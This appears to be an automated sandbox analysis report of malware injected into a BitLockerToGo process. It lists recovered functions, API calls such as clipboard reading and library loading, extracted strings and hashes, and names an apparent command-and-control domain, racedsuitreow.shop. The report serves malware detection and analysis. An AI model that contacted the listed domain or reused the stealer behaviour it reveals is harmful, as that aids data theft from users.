Instruction ID: 57494a602041532e40f9e0fe5a43eb075ba20abf4ad05e887aa124bdaab75cdc
Opcode Fuzzy Hash: b4a194c9eefe91c93900bf20268622116e00de92f2f9c1dfe05727d5a027ea15
Instruction Fuzzy Hash: 9041E476794701DFE7288F28EC51B297BE2FB85350F1A496CE906CB6E0D775A825CB00

Function 02B18BC0 Relevance: 2.6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 02B18C87
%&' , xrefs: 02B18CD3, 02B18CDB

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: %&' $@
API String ID: 2994545307-717135571
Opcode ID: 64248fa667ffb465fa16d8433d21c1cc9164d8b226c8641724f3d721fa964673
Instruction ID: 8d16346be658dcaaf1409d3ebd07b7e9a320635a66734ddb4044df5881c8b461
Opcode Fuzzy Hash: 64248fa667ffb465fa16d8433d21c1cc9164d8b226c8641724f3d721fa964673
Instruction Fuzzy Hash: F941FDB15083009FD710DF58C880A6BBBF6FF85358F88896DE489CB2A1E375C918CB52

Function 02AE076F Relevance: 1.5, Strings: 1, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@A, xrefs: 02AE0412

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: @A
API String ID: 0-2960862460
Opcode ID: 58ab9b0bfcaac8b86f8a6e627fe0e0891bf5fd4ba1ac5eb85ed8fa1d641c591f
Instruction ID: 07b59fef8fb7708536f199a0189673ebb2155032abf3d4a1e13ab97dd43a68ad
Opcode Fuzzy Hash: 58ab9b0bfcaac8b86f8a6e627fe0e0891bf5fd4ba1ac5eb85ed8fa1d641c591f
Instruction Fuzzy Hash: CB918570508341EFD7109F65E890B2BBBF5AF89384F819C2CF99587250DB78D865CB12

Function 02AE1D87 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 356
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 02AE21C9

Strings

~x, xrefs: 02AE2266
racedsuitreow.shop, xrefs: 02AE2185
FAE8DCA8A7591667ED0AFBD62A21FAC1, xrefs: 02AE1D87
1BE*, xrefs: 02AE1E37

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: DirectorySystem
String ID: 1BE*$FAE8DCA8A7591667ED0AFBD62A21FAC1$racedsuitreow.shop$~x
API String ID: 2188284642-2341768932
Opcode ID: 30489b3f316d89efb9f8b8717da53c110cbf80d98d1487ffd700edf004d282b6
Instruction ID: 19bd5b970dcb1ba750e5dcfd77d83e45b3de638ebff329a0006542cea2ab495d
Opcode Fuzzy Hash: 30489b3f316d89efb9f8b8717da53c110cbf80d98d1487ffd700edf004d282b6
Instruction Fuzzy Hash: F3C178B444A3D1CAE7318F149894BAFBBE1BF86344F440D5DE8CA4B242D7358506CBA3

Function 02ADE8D0 Relevance: 1.6, APIs: 1, Instructions: 109
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(1FB719A3,00000000,C9CAF3CC), ref: 02ADE9BE

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a992f5c5a3b6fd6d3ff03c2c54d252d85451c2a1671f4abfffd9dd1d9fdb5e56
Instruction ID: f0af592a50794a3608ea16606eefce838c2aec8bb7e581b605c4056acf58c3e0
Opcode Fuzzy Hash: a992f5c5a3b6fd6d3ff03c2c54d252d85451c2a1671f4abfffd9dd1d9fdb5e56
Instruction Fuzzy Hash: 2D41C1B0D58340AFD3119F24E841A1EFBE6FB85344F405C6CE4846B211DB398569CF62

Function 02B14E47 Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(09840B71,00000000,00000800), ref: 02B14ED2

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7168e6d17aefc6f370ebd28654095c83af1b57232e4a444b737d882210779f0f
Instruction ID: 0d650993e6cc1dd0962c83c99a7259246098bad96e2feb086444f5bd20ad7b16
Opcode Fuzzy Hash: 7168e6d17aefc6f370ebd28654095c83af1b57232e4a444b737d882210779f0f
Instruction Fuzzy Hash: 9C1194759983009FC300EF28E88462ABBF1EB98388F944C1CE5C6C3342D7399968CF16

Function 02B0E349 Relevance: 1.6, APIs: 1, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 02B0E3B0

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 6e1bada3894e27ac571ae6a98ad0a3779e2aa068788b614955dfd79a8e0c2fc5
Instruction ID: eedc87878dfef1cc182f6a9696d1508457a7de34f62a1e844ce4be4089839aca
Opcode Fuzzy Hash: 6e1bada3894e27ac571ae6a98ad0a3779e2aa068788b614955dfd79a8e0c2fc5
Instruction Fuzzy Hash: 6C018C74605240DFD725CF58C4D4A027FF1EF5A341B600888E8C28B256C33AE866DB90

Function 02B11F20 Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02B11F87

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 33baaa68d7349529add0e03da518275e6cf3aafa264fd33f288eaf3a70f61208
Instruction ID: ad6b7fe43475677591d707bd695b9c67183d4664b33e86c95ca18a1724928080
Opcode Fuzzy Hash: 33baaa68d7349529add0e03da518275e6cf3aafa264fd33f288eaf3a70f61208
Instruction Fuzzy Hash: 65F017B4508280ABD311EF08D895A1EFBF5FB95604F848D5CE5C887261C335D828CB66

Function 02B11FA0 Relevance: 1.5, APIs: 1, Instructions: 38
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 02B12003

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: dffab1e158853bab55bf1bcf5c5ba9190559956add7c8c4a123f352b99cebd96
Instruction ID: e7700f61438dcd542b1650f854c170b18e55ba823c4a890863bc031b8be83fed
Opcode Fuzzy Hash: dffab1e158853bab55bf1bcf5c5ba9190559956add7c8c4a123f352b99cebd96
Instruction Fuzzy Hash: 73018C3490C240DBC311EF18D844A1EFBF4EF1A641F865D58E8C4E7251C331D824CBA6

Function 02AE1D65 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02AE1D77

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: a48b7d22c4e7df6cbf3b403708041950eb0b1dbbff8457222140204bc2cbaaf7
Instruction ID: 2979efe01da679db040d6f603aedca84b64f2ad274f58193b7c5f86c202cc81d
Opcode Fuzzy Hash: a48b7d22c4e7df6cbf3b403708041950eb0b1dbbff8457222140204bc2cbaaf7
Instruction Fuzzy Hash: 45D048307C8311B6F1310A08BC17F443110A702F62FB00B10B320BD0C089E03120861D

Function 02AE1D40 Relevance: 1.3, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02AE1D51

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e6425b681d978b2a98e7f4fe9989c758cf45fa50600b6172f022d981bea3718d
Instruction ID: 8d502ebc252b16f2f6d55748e9f6f65f810acd1212891e605e1fabb7b41ed34e
Opcode Fuzzy Hash: e6425b681d978b2a98e7f4fe9989c758cf45fa50600b6172f022d981bea3718d
Instruction Fuzzy Hash: 06C01220554605B7D34037356C1BE27355C93466A1F400734BD62829C1F9201524C1B5

Non-executed Functions

Function 02AEE35A Relevance: 29.4, Strings: 22, Instructions: 1928COMMON

Download Yara Rule

Strings

kji, xrefs: 02AEF250
sq, xrefs: 02AEF23A
twvy, xrefs: 02AEEBC4
4`[b, xrefs: 02AEF690
LONA, xrefs: 02AEECD5
^VI, xrefs: 02AEECBF
!"#m, xrefs: 02AEEBA3
47, xrefs: 02AEF4A6
UW, xrefs: 02AEE3BB
8?, xrefs: 02AEFE9F
de, xrefs: 02AEFD2D
U'p!, xrefs: 02AEF47A
`cb,, xrefs: 02AEEB8D
-./ , xrefs: 02AEEB98
1{z}, xrefs: 02AEEBCF
HKJM, xrefs: 02AEECCA
K, xrefs: 02AEF8E7
wu, xrefs: 02AEF245
lonq, xrefs: 02AEEBAE
p;|9, xrefs: 02AEFE97
U+l), xrefs: 02AEFEC3, 02AEFECB
9:;<, xrefs: 02AEEBB9

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: K$!"#m$-./ $1{z}$47$4`[b$8?$9:;<$HKJM$LONA$U'p!$U+l)$`cb,$de$lonq$p;|9$twvy$UW$^VI$kji$sq$wu
API String ID: 2994545307-703385227
Opcode ID: 7d07f3ad28c6bbfe6a00d27d076680d1076779ad8f550891e71e0d15228ed5a2
Instruction ID: 46fdd0c3de4d01529ada4e292980649f4de71a48e763d937b2197b2260593df9
Opcode Fuzzy Hash: 7d07f3ad28c6bbfe6a00d27d076680d1076779ad8f550891e71e0d15228ed5a2
Instruction Fuzzy Hash: C4E278B15083809FDB20DF14C880B6FBBE1FF85318F54891DE6DA9B291EB359905CB96

Function 02B00DD0 Relevance: 29.2, APIs: 4, Strings: 11, Instructions: 2927libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 02B01C03

Strings

~PF<, xrefs: 02B00E74
7*`{, xrefs: 02B00F85
AU", xrefs: 02B00FB7
GAv@, xrefs: 02B02865
(}*(, xrefs: 02B00F7B
=47", xrefs: 02B00F49
::18, xrefs: 02B00F53
2FD>, xrefs: 02B01684
84N(, xrefs: 02B02EC4
Wpy{, xrefs: 02B03397
:"@h, xrefs: 02B00F5D

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID: (}*($2FD>$7*`{$84N($:"@h$::18$=47"$AU"$GAv@$Wpy{$~PF<
API String ID: 1029625771-2248917442
Opcode ID: 40137f34d564d00e38ea22b39561b816b7959a63b6d27f0f06cd2395e32fbfcb
Instruction ID: aed22fab6d24d732a453f10a8e1b7f76ae47558227521c7e2aeb230c7f71b9e8
Opcode Fuzzy Hash: 40137f34d564d00e38ea22b39561b816b7959a63b6d27f0f06cd2395e32fbfcb
Instruction Fuzzy Hash: 42238D70504B808BD7768F39C494BA7BFE1EF16305F58899DD4EB8B282DB35A449CB50

Function 02B07400 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 104clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02B07410
GetWindowLongW.USER32 ref: 02B07435
GetClipboardData.USER32 ref: 02B07445
GlobalLock.KERNEL32 ref: 02B07468
GlobalUnlock.KERNEL32 ref: 02B07552
CloseClipboard.USER32 ref: 02B0755D

Strings

U, xrefs: 02B0749B
W, xrefs: 02B074A0
_, xrefs: 02B074A5
O, xrefs: 02B074CD
^, xrefs: 02B074AF
R, xrefs: 02B074C8
U, xrefs: 02B074B9
P, xrefs: 02B074D2

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: O$P$R$U$U$W$^$_
API String ID: 2832541153-2296721427
Opcode ID: 437d1d0c30dc4f778b37e701b48971de13c5f04117b59b51fd3865539de71bc7
Instruction ID: 66ac31f1c66f688d876e93262d461a05f90a9e6ebfd7dd2c2864a531bb48ef16
Opcode Fuzzy Hash: 437d1d0c30dc4f778b37e701b48971de13c5f04117b59b51fd3865539de71bc7
Instruction Fuzzy Hash: 55416B7050C7818FD301EF38948836FFFE0AB96214F0449ADE4D986282CA79D548DB93

Function 02AF7BA6 Relevance: 16.0, Strings: 12, Instructions: 1021COMMON

Download Yara Rule

Strings

_Y, xrefs: 02AF821A
lF, xrefs: 02AF8228
Z\, xrefs: 02AF8472
4`[b, xrefs: 02AF8600
O\, xrefs: 02AF8213
SX, xrefs: 02AF8221
}=x3, xrefs: 02AF84CE
][, xrefs: 02AF808D
C"E, xrefs: 02AF7CB4
z1}7, xrefs: 02AF84D8
4`[b, xrefs: 02AF8B80
~9h?, xrefs: 02AF84C4

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$O\$SX$Z\$_Y$lF$z1}7$}=x3$~9h?$C"E$][
API String ID: 0-280544624
Opcode ID: bb026e4abb2a3846df3e5eacca252732e9ade188d4a251bb5563a77686832125
Instruction ID: 300061130785ce51a1d37a33abfbc7e21dfa59bf3d1960be7d117ea09ae40b5f
Opcode Fuzzy Hash: bb026e4abb2a3846df3e5eacca252732e9ade188d4a251bb5563a77686832125
Instruction Fuzzy Hash: D89278B4A00A0AEFDB14CFA5D9806AEFBB1FF05340F608508E559AB751D738A961CFD1

Function 02AE27F9 Relevance: 14.2, APIs: 1, Strings: 8, Instructions: 688COMMON

Download Yara Rule

APIs

Part of subcall function 02B07400: OpenClipboard.USER32 ref: 02B07410
Part of subcall function 02B07400: GetWindowLongW.USER32 ref: 02B07435
Part of subcall function 02B07400: GetClipboardData.USER32 ref: 02B07445
Part of subcall function 02B07400: CloseClipboard.USER32 ref: 02B0755D

CoUninitialize.OLE32 ref: 02AE2856

Strings

racedsuitreow.shop, xrefs: 02AE2CE3
4`[b, xrefs: 02AE321D
y{, xrefs: 02AE2F27
*1Q, xrefs: 02AE2917, 02AE2923
D, xrefs: 02AE3156
T]R#, xrefs: 02AE2987
Rqs, xrefs: 02AE2F17
8, xrefs: 02AE299D

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenUninitializeWindow
String ID: *1Q$4`[b$8$D$Rqs$T]R#$racedsuitreow.shop$y{
API String ID: 2969723533-1374116824
Opcode ID: 6344a7dea565cddaf5e0b86a3f26d46b5b5bac28ecae748a1dee80b1c57688a7
Instruction ID: 962610dff480eb4f87718bbab596d8ef502b83d6b0ffb73d5cb84e0c1b5c525c
Opcode Fuzzy Hash: 6344a7dea565cddaf5e0b86a3f26d46b5b5bac28ecae748a1dee80b1c57688a7
Instruction Fuzzy Hash: BF3257B0449381DBEB21CF14D494BAFBBE1BF86348F44495CE8CA5B281DB76950ACF52

Function 02AECA10 Relevance: 13.2, Strings: 10, Instructions: 659COMMON

Download Yara Rule

Strings

[M, xrefs: 02AECEC7
J, xrefs: 02AECADD
r, xrefs: 02AED1DA
Ks, xrefs: 02AECAD2
\f, xrefs: 02AECCE1
X, xrefs: 02AECCEC
4`[b, xrefs: 02AECE70
4`[b, xrefs: 02AED170
I^, xrefs: 02AECECF
lC, xrefs: 02AECEDF

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$I^$J$Ks$X$[M$\f$lC$r
API String ID: 0-1032006572
Opcode ID: 7df7fa8884400e46635303872dd7971e661a1236518cf9b8e8f993d895cf93a8
Instruction ID: a4cf56c4ca003499bc27b84028227efd5f5693146d481009ba0a46e00996ee5b
Opcode Fuzzy Hash: 7df7fa8884400e46635303872dd7971e661a1236518cf9b8e8f993d895cf93a8
Instruction Fuzzy Hash: 6A12CCB5808380DBD7309F24D880B6BB7E6FF85359F440919F69A8B261EB39D911CB52

Function 02AD1000 Relevance: 11.9, Strings: 8, Instructions: 1867COMMON

Download Yara Rule

Strings

gfff, xrefs: 02AD229E
@, xrefs: 02AD18E0
0123456789abcdefxp, xrefs: 02AD1482, 02AD14EE
gfff, xrefs: 02AD2351
0123456789ABCDEFXP, xrefs: 02AD1476, 02AD14DF
-, xrefs: 02AD224C
gfff, xrefs: 02AD2308
A, xrefs: 02AD147B

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff
API String ID: 0-2771814109
Opcode ID: b100568a374720a6aeb4d2b283dd3356208b9df468bf616d7c19289d628e5113
Instruction ID: f2bf5b5a731c22b85f538f1b00fc93693bb4fe8cf82aece323c065bf801ac5d3
Opcode Fuzzy Hash: b100568a374720a6aeb4d2b283dd3356208b9df468bf616d7c19289d628e5113
Instruction Fuzzy Hash: 1CD2E775A083518FD714CF28C48036AFBE2AFC5314F188A6DE89ADB391DB75D945CB82

Function 02AD131E Relevance: 9.7, Strings: 7, Instructions: 931COMMON

Download Yara Rule

Strings

d, xrefs: 02AD1DA9
0, xrefs: 02AD1E8F
0, xrefs: 02AD1E55
u, xrefs: 02AD1762
i, xrefs: 02AD291C
0, xrefs: 02AD249D
0, xrefs: 02AD1EED

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$0$0$0$d$i$u
API String ID: 0-3486945486
Opcode ID: 1de251031d2a482816023c4ca8c598314d7744be144c9700965320674aa71c46
Instruction ID: 9967444fe17d24f461c8e83bcbac5caa3daad38338f2720f2c189f849606e686
Opcode Fuzzy Hash: 1de251031d2a482816023c4ca8c598314d7744be144c9700965320674aa71c46
Instruction Fuzzy Hash: 9D72E275A083418FD318CF28C49076ABBE2EFC5744F148A6DE8DA97392DB75D905CB82

Function 02AED26A Relevance: 9.5, Strings: 7, Instructions: 720COMMON

Download Yara Rule

Strings

?W2Q4[(U'_3Y_#[]@'T!, xrefs: 02AEDA5D, 02AEDA64
?Z1, xrefs: 02AED507, 02AED513
_#[], xrefs: 02AED847
AG<D, xrefs: 02AEDBDE
3>?<, xrefs: 02AEDBE6
-C3}, xrefs: 02AED896
4`[b, xrefs: 02AEDBA0

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?Z1$-C3}$3>?<$4`[b$?W2Q4[(U'_3Y_#[]@'T!$AG<D$_#[]
API String ID: 0-4270218272
Opcode ID: 1cf1b97de3ee643f83f738ff90d4a42e04ddde05ae93e0a6827d403054441bc7
Instruction ID: aa0f640be6e3a75cb8fc20cb6aa624f5f34dae3e28cb804f6279b5254927bab6
Opcode Fuzzy Hash: 1cf1b97de3ee643f83f738ff90d4a42e04ddde05ae93e0a6827d403054441bc7
Instruction Fuzzy Hash: 295279B59087808FD730DF24D490BAFBBE6BF85308F54491DE69A8B291DB359806CF52

Function 02ADF380 Relevance: 9.1, Strings: 7, Instructions: 389COMMON

Download Yara Rule

Strings

7y, xrefs: 02ADF4BA
iUcK268UmskJ7BooTQRCfMUbls.hg05IeE3Z8iZ6ob4-1727337613-0.0.1.1-/api, xrefs: 02ADF817, 02ADF834
LO, xrefs: 02ADF54C
fu, xrefs: 02ADF4B2
Gx, xrefs: 02ADF4CA
~z, xrefs: 02ADF4C2
B, xrefs: 02ADF5BF

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 7y$B$Gx$LO$fu$iUcK268UmskJ7BooTQRCfMUbls.hg05IeE3Z8iZ6ob4-1727337613-0.0.1.1-/api$~z
API String ID: 0-2937790833
Opcode ID: fe5be4c2529d8625f4f8799d2dea9be0e9d90813e01905185156d11f839e09ca
Instruction ID: 490717f7a854d1b854e63cea2cb1d0fa0abd38b12c91a40947e4276b8eb36caf
Opcode Fuzzy Hash: fe5be4c2529d8625f4f8799d2dea9be0e9d90813e01905185156d11f839e09ca
Instruction Fuzzy Hash: C3D17AB450C3808FD311DF18C494A6FFBE1AF92648F28095CE4D68B661DB36D949CB97

Function 02AF658F Relevance: 8.3, Strings: 6, Instructions: 849COMMON

Download Yara Rule

Strings

WS-#, xrefs: 02AF6771
i2]/, xrefs: 02AF6718, 02AF6839, 02AF6803, 02AF66E3, 02AF66EB, 02AF680B
z{, xrefs: 02AF67D9
+3AC, xrefs: 02AF6791
* ,$, xrefs: 02AF6761
7+9D, xrefs: 02AF6789

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: * ,$$+3AC$7+9D$WS-#$i2]/$z{
API String ID: 0-3511077612
Opcode ID: 2675765845a7d75b55a757bae753743a06b69a8da8883b3001493a7a2a27dc83
Instruction ID: 16df220115a609079ec66a86d5f4ad4be0577cfe30c388fd66d2ed80af7a6376
Opcode Fuzzy Hash: 2675765845a7d75b55a757bae753743a06b69a8da8883b3001493a7a2a27dc83
Instruction Fuzzy Hash: 7052FB71A08341DFD314DF28D890B2ABBE6FB99344F4A8D6CF59587291DB34D868CB42

Function 02AD13B8 Relevance: 7.9, Strings: 6, Instructions: 367COMMON

Download Yara Rule

Strings

gfff, xrefs: 02AD1FD4
gfff, xrefs: 02AD1FF3
E, xrefs: 02AD13BD
0123456789abcdefxp, xrefs: 02AD13C4
-, xrefs: 02AD1FBC
0123456789ABCDEFXP, xrefs: 02AD13B8

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$E$gfff$gfff
API String ID: 0-2211778581
Opcode ID: 3d9111e0cf604192a002be60a900679810c1065d716ee1261f33bc24e7a1d517
Instruction ID: 2c5a183a20c4800bab5262df4d355d6e77cd0960ea57955ea63a5d498582ac68
Opcode Fuzzy Hash: 3d9111e0cf604192a002be60a900679810c1065d716ee1261f33bc24e7a1d517
Instruction Fuzzy Hash: 63D1A17550C7928FC715CF29C48036AFBE2AFD5204F088A6EE8DA87356D735D909CB92

Function 02AEF7B0 Relevance: 6.9, Strings: 5, Instructions: 676COMMON

Download Yara Rule

Strings

K, xrefs: 02AEF8E7
p;|9, xrefs: 02AEFE97
8?, xrefs: 02AEFE9F
U+l), xrefs: 02AEFEC3, 02AEFECB
de, xrefs: 02AEFD2D

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: K$8?$U+l)$de$p;|9
API String ID: 0-2269028047
Opcode ID: d457e5e45bcfde24b162b062a1b0a3ed3899c60c48329915cfcd0c0ef77a66e6
Instruction ID: 176e9a34b94d6780069c77b8dce04ac4428b8cc9775408edfef4ab0f2a18c6da
Opcode Fuzzy Hash: d457e5e45bcfde24b162b062a1b0a3ed3899c60c48329915cfcd0c0ef77a66e6
Instruction Fuzzy Hash: A02274B45083809FCB10AF18D880A2FBBF1EF96358F448D1DE4D98B251E739C916CB96

Function 02AFA070 Relevance: 6.7, Strings: 5, Instructions: 405COMMON

Download Yara Rule

Strings

Mx, xrefs: 02AFA1B1
4`[b, xrefs: 02AFA5F0
L}, xrefs: 02AFA1BC
\], xrefs: 02AFA1A6
4`[b, xrefs: 02AFA680

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$L}$Mx$\]
API String ID: 0-3088997012
Opcode ID: 8c7808b457c37db01bf3c82baccedfc241bc59fc4bbfd378dbaeaec829113510
Instruction ID: 4b7e7f940d4226a12334e825ef0eee2cff40d8c3fb9f565fa6808633d23fcdf0
Opcode Fuzzy Hash: 8c7808b457c37db01bf3c82baccedfc241bc59fc4bbfd378dbaeaec829113510
Instruction Fuzzy Hash: 3CE165B4948340DFE360EF64E880B6ABBE5FB85344F458D2CE6D887292DB359815CF52

Function 02ADD670 Relevance: 6.6, Strings: 5, Instructions: 365COMMON

Download Yara Rule

Strings

jhJ6, xrefs: 02ADDA05
a|hi, xrefs: 02ADDA1D
tai|, xrefs: 02ADDA15
t, xrefs: 02ADD6CB
dd3~, xrefs: 02ADDA0D

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: a|hi$dd3~$jhJ6$tai|$t
API String ID: 0-2630083251
Opcode ID: c76c92dc6813815e80f885c319de2628f100eff9e1e8739f756bfeb419b3f333
Instruction ID: 491f3b4bfa2b832e97de30995d19403ac9016234503a6e4ff360e90b936ab6ec
Opcode Fuzzy Hash: c76c92dc6813815e80f885c319de2628f100eff9e1e8739f756bfeb419b3f333
Instruction Fuzzy Hash: 41C17BB540C7908FD3218F29C49066AFBE1AF96614F18899DE4EA5B352CB35C505CBA3

Function 02AE0BD3 Relevance: 6.5, Strings: 5, Instructions: 216COMMON

Download Yara Rule

Strings

\S, xrefs: 02AE0D4E
sq, xrefs: 02AE0D0E
